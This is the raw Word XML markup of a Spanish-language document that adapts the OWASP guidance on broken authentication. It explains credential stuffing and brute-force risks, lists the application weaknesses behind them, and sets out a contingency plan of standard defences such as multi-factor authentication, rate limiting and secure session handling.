              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1872472D" wp14:editId="73214609">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-81915</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>267162</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8205470" cy="866140"/>
                  <wp:effectExtent l="0" t="0" r="508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54CB6D.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId77">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8205470" cy="866140"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRDefault="00EB2C3A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRPr="00912EEA" w:rsidRDefault="00EB2C3A" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00EB2C3A" w:rsidRDefault="00912EEA" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB2C3A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los atacantes tienen acceso a millones de combinaciones de pares de usuario y contraseña conocidos (debido a fugas de información), además de cuentas administrativas por defecto. Pueden realizar ataques mediante herramientas de fuerza bruta o diccionarios para romper los hashes de las contraseñas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00EB2C3A" w:rsidRDefault="00912EEA" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB2C3A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los errores de pérdida de autenticación son comunes debido al diseño y la implementación de la mayoría de los controles de acceso. La gestión de sesiones es la piedra angular de los controles de autenticación y está presente en las aplicaciones.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00EB2C3A" w:rsidRDefault="00912EEA" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB2C3A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los ataques pueden detectar la autenticación defectuosa utilizando medios manuales y explotarlos utilizando herramientas automatizadas con listas de contraseñas y ataques de diccionario.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB2C3A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Los ataques solo tienen que obtener el acceso a unas pocas cuentas o a una cuenta de administrador para comprometer el sistema. Dependiendo del dominio de la aplicación, esto puede permitir rodo de identidad, lavado de dinero y divulgación de información sensible protegida legalmente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRDefault="00EB2C3A" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRDefault="00EB2C3A" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRDefault="00EB2C3A" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EB2C3A" w:rsidRPr="00EB2C3A" w:rsidRDefault="00EB2C3A" w:rsidP="00EB2C3A">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>La confirmación de la identidad y la gestión de sesiones del usuario son fundamentales para protegerse contra ataques relacionados con la autenticación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pueden existir debilidades de autenticación si la aplicación:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Permite ataques automatizados como la reutilización de credenciales conocidas, cuando el atacante ya posee una lista de pares de usuario y contraseña validados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Permiten ataques de fuerza bruta y/o ataques automatizados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Permite contraseñas por defecto, débiles o muy conocidas, como “Password1”, “Contraseña1” o “admin/admin”.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Posee procesos débiles o inefectivos en el proceso de recuperación de credenciales, como “respuestas basadas en el conocimiento”, las cuales no se pueden implementar de forma segura.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Almacena las contraseñas en texto claro o cifrado con métodos de hashing débiles.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00101019" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No posee autenticación multi-factor o fue implementada de forma ineficaz.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00101019">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00101019">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Expone sesión IDs en las URL, no la invalida correctamente o no la rota satisfactoriamente luego del cierre de sesión o de un periodo de tiempo determinado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Implemente autenticación multi-factor para evitar ataques automatizados, de fuerza bruta o reúso de credenciales robadas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No utilice credenciales por defecto en su software, particularmente en el caso de administradores.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Implemente controles contra contraseñas débiles. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Alinear la política de longitud, complejidad y rotación de contraseñas con las recomendaciones de la Sección para secretos de memorización  </w:t>
            </w:r>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:szCs w:val="22"/>
                </w:rPr>
                <w:id w:val="146709933"/>
                <w:citation/>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> CITATION pag18 \l 2058 </w:instrText>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:noProof/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:t>(pages.nist.gov, 2018)</w:t>
                </w:r>
                <w:r w:rsidRPr="00912EEA">
                  <w:rPr>
                    <w:rFonts w:cs="Times New Roman"/>
                    <w:szCs w:val="22"/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> u otras políticas de contraseñas modernas, basadas en evidencias.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mediante la utilización de los mensajes genéricos iguales en todas las salidas, asegúrese que el registro, la recuperación de credenciales y el uso de APIs, no permiten ataques de enumeración de usuarios.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Limite o incremente el tiempo de respuesta de cada intento fallido de inicio de sesión. Registre todos los </w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>fallos y avise a los administradores cuando se detecten ataques de fuerza bruta.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Utilice un gestor de sesión en el servidor, integrado, seguro y que genere un nuevo ID de sesión aleatorio con alta entropía después del inicio de sesión. El sesión-ID no debe incluirse en la URL, debe almacenarse de forma segura y ser invalidado después del cierre de sesión o de un tiempo de inactividad determinado por la criticidad del negocio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D86C8E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00D86C8E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D86C8E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>El relleno automático de credenciales y el uso de listas de contraseñas conocidas son ataques comunes. Si una aplicación no implementa protecciones automáticas, podrían utilizarse para determinar si las credenciales son válidas.</w:t>
            </w:r>
          </w:p>
